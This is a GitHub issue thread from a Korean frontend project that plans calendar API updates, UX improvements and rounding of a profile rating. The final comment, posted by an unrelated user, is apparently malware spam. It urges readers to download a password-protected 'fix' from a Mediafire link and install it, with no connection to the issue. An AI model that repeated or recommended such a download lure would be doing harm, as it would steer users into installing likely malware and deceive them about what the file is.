### ISSUE TITLE
[MM-192] Calendar 관련 API BE 수정사항 반영, UX 개선

### ISSUE THREAD

**Issue by dydals3440** [M0IM/FE-M#131]
## 👀 어떤 기능을 추가할 것인가요?
> [MM-192] Calendar 관련 API BE 수정사항 반영, UX 개선

## 🍀 기능을 추가하기 위해 어떤 작업이 진행될 것인가요?
> 기능을 추가하는 과정에서 진행될 작업에 대해 간략히 설명해주세요!
- [ ] MyCalendar 관련 API 수정 사항을 반영합니다.
- [ ] MoimCalendar 관련 API 수정 사항을 반영합니다.
- [ ] Calendar 동작에 있어서, UX를 개선합니다.
- [ ] MyPage 내 프로필 조회시, 나의 평점 소수점 1자리가 toFixed 처리를 합니다.

## ☕️ 어떤 브랜치에서 작업이 진행될까요?
> [MM-192]

## 📒 이해를 돕기 위한 참고 자료 및 스크린샷을 첨부해주세요. (선택사항)
<img width="421" alt="스크린샷 2024-08-27 오후 4 42 43" src="https://github.com/user-attachments/assets/b524aae5-e745-4407-93ec-ec8d51de6084">
현재 일정 부분, 화면이 보이지 않아, 변경 API 반영 후, 기능 재연결 예정입니다.

[MM-192]: https://dydals3440.atlassian.net/browse/MM-192?atlOrigin=eyJpIjoiNWRkNTljNzYxNjVmNDY3MDlhMDU5Y2ZhYzA5YTRkZjUiLCJwIjoiZ2l0aHViLWNvbS1KU1cifQ
[MM-192]: https://dydals3440.atlassian.net/browse/MM-192?atlOrigin=eyJpIjoiNWRkNTljNzYxNjVmNDY3MDlhMDU5Y2ZhYzA5YTRkZjUiLCJwIjoiZ2l0aHViLWNvbS1KU1cifQ

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
